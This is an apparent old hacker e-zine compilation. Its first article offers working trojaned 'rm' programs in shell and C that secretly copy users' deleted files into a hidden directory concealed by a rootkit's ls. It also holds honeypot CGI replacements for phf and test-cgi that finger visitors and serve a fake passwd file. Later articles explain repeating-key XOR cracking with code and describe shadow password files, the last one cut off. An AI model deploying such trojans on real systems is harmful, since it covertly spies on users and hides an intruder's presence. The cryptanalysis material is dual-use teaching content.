mkdir /tmp/hist; chmod 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls).
There are two versions of this....I wrote the first one in shell script,
but due to the fact it has to be a+r, I wrote it in C afterwards. Here is
the rm.sh:

#!/bin/sh
# rm.sh -- rm "trojan" by (--==+*~Shok~*+==--)
#
# Email: shok@sekurity.org

if [ $# -gt 1 ]
then

case $1 in
-i)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;
--interactive)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;

-f)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;
--force)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;

-d)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;
--directory)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;

-v)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;
--verbose)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;

-r)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
-R)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
--recursive)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;

-ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;
-Ri)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -ri $*
;;

-rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;
-Rf)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rf $*
;;

-rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;
-Rd)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rd $*
;;

-Rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;
-rv)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -rv $*
;;

-fv)
shift
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -fv $*
;;

-Rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;
-rfv)
shift
cp -f $1/* /tmp/fill &>/dev/null
cp -f $1 /tmp/fill &>/dev/null
/bin/rm.bak -rfv $*
;;

*)
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak $*
;;
esac

else

IT=$1
cp -f $IT /tmp/fill
/bin/rm.bak $IT
fi
#----------------------------------------------------

You may have to change the line:
doexec /bin/rm.bak rm -i $*

to:
/bin/rm.bak -i $*
if you do not have doexec, which is on Linux (or Red Hat anyway).



Now for rm.c:

/* ------------------------------------------------------ */

/* rm.c -- rm "trojan" by (--==+*~Shok~*+==--) */
/* ------------------------------------------------------ */
/* Email: shok@sekurity.org */

#include <sys/stat.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


void main(int argc, char **argv)
{
struct stat filestats;
int i;
if (argc > 2)
{
if (strcmp("-i", argv[1])==0) goto interactive;
if (strcmp("-f", argv[1])==0) goto force;
if (strcmp("-v", argv[1])==0) goto verbose;
if (strcmp("-r", argv[1])==0) goto recursive;
if (strcmp("-rf", argv[1])==0) goto rf;
if (strcmp("-ri", argv[1])==0) goto ri;
if (strcmp("-rv", argv[1])==0) goto rv;
if (strcmp("-rvf", argv[1])==0) goto rfv;
if (strcmp("-rfv", argv[1])==0) goto rfv;
if (strcmp("-Rvf", argv[1])==0) goto rfv;
if (strcmp("-Rfv", argv[1])==0) goto rfv;
if (strcmp("-frv", argv[1])==0) goto rfv;
if (strcmp("-fvr", argv[1])==0) goto rfv;
if (strcmp("-fRv", argv[1])==0) goto rfv;
if (strcmp("-fvR", argv[1])==0) goto rfv;
if (strcmp("-vfr", argv[1])==0) goto rfv;
if (strcmp("-vrf", argv[1])==0) goto rfv;
if (strcmp("-vfR", argv[1])==0) goto rfv;
if (strcmp("-vRf", argv[1])==0) goto rfv;
if (strcmp("-fr", argv[1])==0) goto rf;
if (strcmp("-ir", argv[1])==0) goto ri;
if (strcmp("-vr", argv[1])==0) goto rv;

if (strcmp("--interactive", argv[1])==0) goto interactive;
if (strcmp("--force", argv[1])==0) goto force;
if (strcmp("--verbose", argv[1])==0) goto verbose;
if (strcmp("--recursive", argv[1])==0) goto recursive;
}

else {
setenv("PROGRAM", argv[1], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
system("/bin/rm.bak $PROGRAM");
unsetenv("PROGRAM");
}


interactive:

lstat(argv[2], &filestats);
for (i=2;i<argc;i++)
{
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 2);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}

else
{
setenv("PROGRAM", argv[2], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-i",argv[2],NULL);
}
}


force:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-f",argv[i],NULL);
unsetenv("PROGRAM");

}


verbose:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-v",argv[i],NULL);
unsetenv("PROGRAM");
}

recursive:
for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-r",argv[i],NULL);
unsetenv("PROGRAM");
}

rf:

for (i=2;i<argc;i++)
{
lstat(argv[i], &filestats);
if (S_ISDIR(filestats.st_mode))
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM/* /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
else
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
unsetenv("PROGRAM");
execl("/bin/rm.bak","rm","-rf",argv[i],NULL);
}
}


ri:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-ri",argv[i],NULL);
unsetenv("PROGRAM");
}


rv:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rv",argv[i],NULL);
unsetenv("PROGRAM");
}

rfv:

for (i=2;i<argc;i++)
{
setenv("PROGRAM", argv[i], 1);
system("cp -f $PROGRAM /tmp/fill &>/dev/null");
execl("/bin/rm.bak","rm","-rfv",argv[i],NULL);
unsetenv("PROGRAM");
}

}

This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....

Now whenever a user deletes something it will first be copied to
/tmp/fill before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time.

phf.c:


/* ----------------------------------------------------- */
/* phf "trojan" by (--==+*~Shok~*+==--) */
/* ----------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(void)
{

FILE *tmpfile, *fingerinfo;
char *host, *addr, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This is to prevent a finger war, the ip address below is my ip address */
/* just to be on the safe side. But I do have in.fingerd: LOCAL to allow */
/* me to finger without starting a finger war. */
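/* Skip the finger and the mail when the request comes from one of our own addresses */
if (addr == NULL || strcmp(addr, "206.71.69.243") == 0 || strcmp(addr, "127.0.0.1") == 0) exit(0);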

system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo1");

tmpfile=fopen("/var/tmp/.phf", "w");
/* the finger output is opened once, further down, just before it is read */

fprintf(tmpfile, "The following person used phf!!\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);

fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

system("mail -s \"SOMEONE USED phf!!\" root </var/tmp/.phf");

unlink("/var/tmp/.fingerinfo1");
unlink("/var/tmp/.phf");

printf("Content-type: text/html\n\n");
printf("<H1>Query Results</H1>\n");
printf("<P>\n");
printf("/usr/local/bin/ph -m alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:4:8::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("ingres:*:7:7::/usr/ingres:/bin/csh\n");
printf("mail:*:8:12::/:\n");
printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n");
printf("audit:*:9:9::/etc/security/audit:/bin/csh\n");
printf("sync::1:1::/:/bin/sync\n");
printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n");
printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n");
printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n");
printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n");
printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n");
printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n");
printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n");
printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n");
printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n");
printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n");
printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");
}

This is what shows up in root's mail:


The following person used phf!!

Host: ts037d12.chi-il.concentric.net
Address: 206.173.188.168
User (if able): (null)
Ident (if able): (null)
Browser type: (null)
Query String (aka command entered): Qalias=X%0aid

I did a finger of the person trying to exploit us:
--------------------------------------------------
[206.173.188.168]
(probably Win95 which is why there was no output as Win95 doesn't have an
actual "finger" program)




Now for the test-cgi...this does the same thing except it will send a
"File Not found" instead:

test-cgi.c:

/* --------------------------------------------------- */
/* test-cgi.c -- test-cgi "trojan" by --==+*~Shok~+*-- */
/* --------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
FILE *tmpfile, *fingerinfo;
char *host, *addr, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This is to prevent a finger war, for safety, even though you SHOULD */
/* have in.fingerd: LOCAL in your hosts.allow */

if (addr == NULL || strcmp(addr, "206.71.69.243") == 0 || strcmp(addr, "127.0.0.1") == 0) exit(0);
system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

tmpfile=fopen("/var/tmp/.test-cgi", "w");
fprintf(tmpfile, "The following person used test-cgi:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

/* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */
/* to whatever you want */

system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi");

unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.test-cgi");

printf("Content-type: text/html\n\n");
printf("<h2>File Not found\n</h2>");
printf("The requested URL /cgi-bin/test-cgi was not found on this server.");

}



Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I edited my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

ErrorDocument 401 /cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs
by the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......

unauthorized.c:


/* -------------------------------------------------------- */
/* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */
/* -------------------------------------------------------- */
/* Email: shok@sekurity.org */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int main(void)
{
FILE *tmpfile, *fingerinfo;
char *host, *addr, *user, *ident, *browser, *query_string;
char fingerbuf[2048];

host=getenv("REMOTE_HOST");
addr=getenv("REMOTE_ADDR");
user=getenv("REMOTE_USER");
ident=getenv("REMOTE_IDENT");
browser=getenv("HTTP_USER_AGENT");
query_string=getenv("QUERY_STRING");

/* This can get ugly */
if ((strcmp(addr, "206.71.69.243"))==0) exit(0);

system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

tmpfile=fopen("/var/tmp/.unauthorized", "w");
fprintf(tmpfile, "The following person has unauthorized access:\n\n");
fprintf(tmpfile, "\tHost: %s\n", host);
fprintf(tmpfile, "\tAddress: %s\n", addr);
fprintf(tmpfile, "\tUser (if able): %s\n", user);
fprintf(tmpfile, "\tIdent (if able): %s\n", ident);
fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person:\n");
fprintf(tmpfile, "-----------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

system("mail -s \"Someone tried unauthorized access\" root </var/tmp/.unauthorized");

unlink("/var/tmp/.fingerinfo");
unlink("/var/tmp/.unauthorized");

printf("Content-type: text/html\n\n");
printf("<HEAD><TITLE>Unauthorized</TITLE></HEAD>");
printf("<BODY><H1>Unauthorized</H1>");
printf("You are unauthorized and unwanted here.\n Go away <FONT COLOR=\"red\">d0rk</FONT><P>");
printf("</BODY>");

}


Here is my hosts.deny too.........in case you wanted to see it ;)
ALL: .cc.edu: spawn /bin/mail -s "%h from CC.EDU tried to access us!!" root
ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root &
in.telnetd: ALL: spawn /bin/mail -s "%h tried to telnet in" root

#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root &

#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &

# PORTMAP
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &

#COMSAT
in.comsat: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &

#REXECD
in.rexecd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &

#RSHD
in.rshd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &

#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &

#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &

#ALL: paranoid


Well.......................................we're winding down to the end.

It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :)

You can access a few of my things at ftp.janova.org (in pub) or
www.janova.org.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Cryptanalytic Attacks on Repeating Key Algorithms
by The Messiah

CONTENTS:
* Introduction
* Background
* Methods Of Attack
* BadCrypt v1.0
* GeneriCrack for DOS v1.0
* Prevention

INTRODUCTION:
Bruce Schneier published an essay called "Why Crypto Is Harder Than It
Looks."
It's true, designing a secure algorithm is MUCH harder than breaking
one. This article is about breaking programs which use a repeating key.
Credit should go out to Kent Briggs, whose WinCrack program opened doors for
me into cryptanalysis. His code is also at the heart of GeneriCrack for DOS,
altered quite a bit, however.

BACKGROUND:
What is cryptanalwhatever? Cryptanalysis is the art of decoding
encrypted messages without the key, or algorithm. In 1994, PC Mag released a
program by Jeff Prosise called WinCrypt. It created a 512-byte block derived
from a passphrase, then XOR'd (eXclusive OR) each 512-byte block of the
plaintext with the key block.

|------Key Block-----|
XOR
|------Plaintext-----|--------------------|--------------------|--------------------|
equals
|-----Ciphertext-----|



|------Key Block-----|
XOR
|--------------------|------Plaintext-----|--------------------|--------------------|
equals
|--------------------|-----Ciphertext-----|

And so on, until the plaintext is completely XOR'd with the key block. The
problem with this is that if you have a file of all 'A's (ordinal value 65),
there will be visible repeating patterns in the ciphertext - A PROBLEM! Why is
that a problem, you ask? Someone would have to find that huge 512-byte key to
decrypt it, right? Errnt.

METHODS OF ATTACK:
WinCrypt's weakness is that it uses the same key byte at known points
in the file. The 1st, 513th, 1025th, 1537th, etc. byte is always XOR'd with
the same byte of the key. The other bytes in the key have no role in the
encryption of the 1st byte. If the 1st byte of the file is an 'A', and the
1st byte in the key is a 'B', then the result will be a byte value of 3,
regardless of what the other entries in the key are. So instead of a 512-byte
key, it's actually 512 1-byte keys. The keyspace for a 512-byte key would be
2^4096 possibilities, but 512 1-byte keys is just 512*256 (number of entries
times number of values per entry). 131072 possible keys is quite a bit less
to search. But we don't have to stop there. If we know some common byte
values in the plaintext, we can search for those, like this:

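for i = 1 to 512 do { each position in the key block }
begin
for j = 0 to 255 do { each candidate value for key byte i }
for every 512-byte block InBlock in the file do
if (InBlock[i] xor j) is in CommonValues then Increment(Count[i][j]);
end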

For each position i, the candidate j with the highest count is the byte that
puts the most decrypted values inside the target byte range, so it is taken
as that key byte. Text files are made up of mostly spaces (ordinal value 32),
CR/LF pairs (13/10), and lower case letters (well, some l33t0 ph|l3z might
have different values, but hey...).

BADCRYPT v1.0:

(*
BadCrypt v1.0 by The Messiah
This program takes a 256-byte array, fills it with the output of a
PRNG seeded with the passphrase, then uses the aforementioned
encryption method.
*)

program BadCrypt;

uses Crt;

type
TKey = array[1..256] of byte;

var
key : TKey;
passphrase, inpath, outpath : String;


procedure Crypt(infile, outfile : String);
var
FromF, ToF: file;
NumRead, NumWritten, I: Integer;
Buf: array[1..256] of byte;
begin
Write('Crypting');
Assign(FromF, infile);
Reset(FromF, 1);
Assign(ToF, outfile);
Rewrite(ToF, 1);
repeat
BlockRead(FromF, Buf, SizeOf(Buf), NumRead);
for i := 1 to NumRead do
Buf[i] := Buf[i] xor Key[i];
BlockWrite(ToF, Buf, NumRead, NumWritten);
Write('.');
until (NumRead = 0) or (NumWritten <> NumRead);
Close(FromF);
Close(ToF);
WriteLn('Done!');
end;

procedure Expand(seed : String; var aKey : TKey);
var
I, J : Integer;
begin
Write('Expanding key');
for i := 1 to Length(seed) do
begin
RandSeed := Ord(seed[i]);
for j := 1 to 256 do
aKey[j] := aKey[j] xor Random(256);
Write('.');
end;
WriteLn('Done!');
end;

begin
WriteLn('BadCrypt v1.0: The Worst Encryption Utility!');
Write('Enter the password: ');
ReadLn(passphrase);
Write('Enter the filepath for the input file: ');
ReadLn(inpath);
Write('Enter the filepath for the output file: ');
ReadLn(outpath);
Expand(passphrase, Key);
Crypt(inpath, outpath);
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }


GENERICRACK V1.0:

(*
GeneriCrack v1.0 for DOS by The Messiah
This cracks files, if you know the key size it was encrypted with.
A 32-bit version will be out soon, so stick around...
*)
program GeneriCrack;

const
MAXKEY = 1024;

var
key, buffer : array[1..MAXKEY] of Byte;
count, maxcount : array[1..MAXKEY] of Integer;
inpath, outpath : String;
kSize : Integer;

procedure Crack(Filename : String; keysize : Integer);
var
file1: file;
i,j, result: integer;
b : byte;
begin
Write('Cracking');
Assign(file1,Filename);
Reset(file1,1);

for i := 1 to KeySize do
begin
key[i] := 0;
maxcount[i] := 0;
end;

for i:=0 to 255 do
begin
seek(file1,0);
for j := 1 to KeySize do
count[j] := 0;
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do
begin
b:= i xor buffer[j];
if b in [10,13,32,97..122] then count[j] := count[j] + 1;
end;
end;
for j:=1 to keysize do if count[j]>maxcount[j] then
begin
key[j]:=i;
maxcount[j]:=count[j];
end;
Write('.');
end;
WriteLn('Done!');
close(file1);
end;

procedure Decrypt(infile, outfile : String; keysize : Integer);
var
file1,file2: file;
i,j, result: integer;
begin
Write('Decrypting');
assign(file1,infile);
reset(file1,1);
assign(file2,outfile);
rewrite(file2,1);
while not eof(file1) do
begin
blockread(file1,buffer,keysize,result);
for j:=1 to result do buffer[j]:= buffer[j] xor key[j];
blockwrite(file2,buffer,result,i);
Write('.');
end;
close(file1);
close(file2);
WriteLn('Done!');
end;

begin
WriteLn('GeneriCrack for DOS v1.0 by The Messiah');
Write('Enter the keysize in bytes: ');
ReadLn(kSize);
Write('Enter the filepath of the input file: ');
ReadLn(inpath);
Write('Enter the filepath of the output file: ');
ReadLn(outpath);
Crack(inpath, kSize);
WriteLn;
Decrypt(inpath, outpath, kSize);
WriteLn;
WriteLn('Hit enter to quit...');
ReadLn;
end.
{ ------------------------------------------------------ }

PREVENTION:
One way to make sure an algorithm you're designing (or using) isn't
vulnerable to this particular attack is to make the encryption data-sensitive.
Have the key change with each block. This will not, of course, make a bad
algorithm good, but it will make it resistant to this particular attack.
Also, if you're running a block cipher in ECB mode, it could be broken with
this attack, AFAIK. I haven't tested it yet, but ECB does the same method for
each block.
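
The per-position weakness from METHODS OF ATTACK and the fix suggested under
PREVENTION, side by side, as an added example (not The Messiah's code). The
16-byte key and the plaintext are constructed; rekeyed_xor is a hypothetical
stand-in for "have the key change with each block" (block n is XOR'd with
SHAKE-256(key || n)) and is not a vetted cipher.

```python
import hashlib

# Byte values the article searches for: LF, CR, space, lower-case a-z.
COMMON = frozenset({10, 13, 32}) | frozenset(range(97, 123))

# Constructed test data (not from the article).
KEY = bytes.fromhex("8f3a5c0117e2b4d96a2390cc7e41f508")   # 16 bytes
SENTENCE = b"the quick brown fox jumps over the lazy dog"  # 43 bytes
# 43 and 16 share no factor, so after 16 repeats every key position
# has been applied to every character of the sentence exactly once.
PLAINTEXT = SENTENCE * len(KEY)


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """WinCrypt/BadCrypt style: byte i is XOR'd with key[i mod keysize]."""
    k = len(key)
    return bytes(b ^ key[i % k] for i, b in enumerate(data))


def rekeyed_xor(data: bytes, key: bytes) -> bytes:
    """Hypothetical variant in which every block gets its own key block."""
    k = len(key)
    out = bytearray()
    for n, start in enumerate(range(0, len(data), k)):
        block_key = hashlib.shake_256(key + n.to_bytes(8, "big")).digest(k)
        out.extend(b ^ kb for b, kb in zip(data[start:start + k], block_key))
    return bytes(out)


def recover_key(ciphertext: bytes, keysize: int) -> bytes:
    """The article's counting attack: each key byte is guessed on its own."""
    key = bytearray(keysize)
    for pos in range(keysize):
        column = ciphertext[pos::keysize]   # bytes that met key byte `pos`
        best = -1
        for cand in range(256):
            hits = sum((c ^ cand) in COMMON for c in column)
            if hits > best:
                best, key[pos] = hits, cand
    return bytes(key)


def distinct_blocks(ciphertext: bytes, keysize: int) -> int:
    """How many different ciphertext blocks occur (1 = fully repeating)."""
    return len({ciphertext[i:i + keysize]
                for i in range(0, len(ciphertext), keysize)})


def demo() -> dict:
    weak = repeating_xor(PLAINTEXT, KEY)
    fixed = rekeyed_xor(PLAINTEXT, KEY)
    all_a = b"A" * 160                      # the "file of all 'A's" case
    return {
        "weak_key_recovered": recover_key(weak, len(KEY)) == KEY,
        "fixed_text_recovered":
            repeating_xor(fixed, recover_key(fixed, len(KEY))) == PLAINTEXT,
        "weak_distinct_blocks":
            distinct_blocks(repeating_xor(all_a, KEY), len(KEY)),
        "fixed_distinct_blocks":
            distinct_blocks(rekeyed_xor(all_a, KEY), len(KEY)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "=", value)
```

With the repeating key, the ten blocks of the all-'A' file collapse to one
ciphertext block and the counting attack returns the exact key; once the key
block changes per block, the columns no longer share a key byte and the same
count finds nothing usable.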

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Shadow files explained
by Shypht

Ok, a few people I knew / know were a bit confused on the purpose on having
a shadowed password file so I decided to write a simple text explaining
them.

-[ ---------------------------------------------------------------------- ]-
Û²±° Introduction : the basics °±²Û
-[ ---------------------------------------------------------------------- ]-

A shadow file is a way of adding extra security to a unix machine. Before
password shadowing, a passwd file would look like this :

( this is in /etc/passwd )

esmith:s920Vk02sl24:6151:100:Edmond Smith:/home/esmith:/bin/bash
  |         |        |    |       |            |           |
  |         |        |    |       |            |           \- which shell they use
  |         |        |    |       |            \- home dir
  |         |        |    |       \- real name/comments/business etc
  |         |        |    \- group id (gid)
  |         |        \- user id (uid)
  |         \- encrypted password
  \--- login name

But computer security became more and more of an issue as more and more
people were grabbing the /etc/passwd file and cracking the encrypted
passwords with a word list and a cracker like brute force, cracker jack,
john the ripper, crack, etc. The reason why a wordlist/dictionary file
is used is because the encrypted password uses a one-way hash. To crack
the password, the cracker compares the one-way hash of each word in the
word list to the encrypted password until a match is found.

So they decided they needed more security and started to shadow
their password files. The entries still look pretty much the same, but
instead of the encrypted password there is a * in its place, so if you
were to cat /etc/passwd you'd get :

( location varies on systems see further down for more info )

esmith:*:6151:100:Edmond Smith:/home/esmith:/bin/bash
^- shadowed password file, not much use eh?

People may wonder why the system admins wouldn't just make /etc/passwd
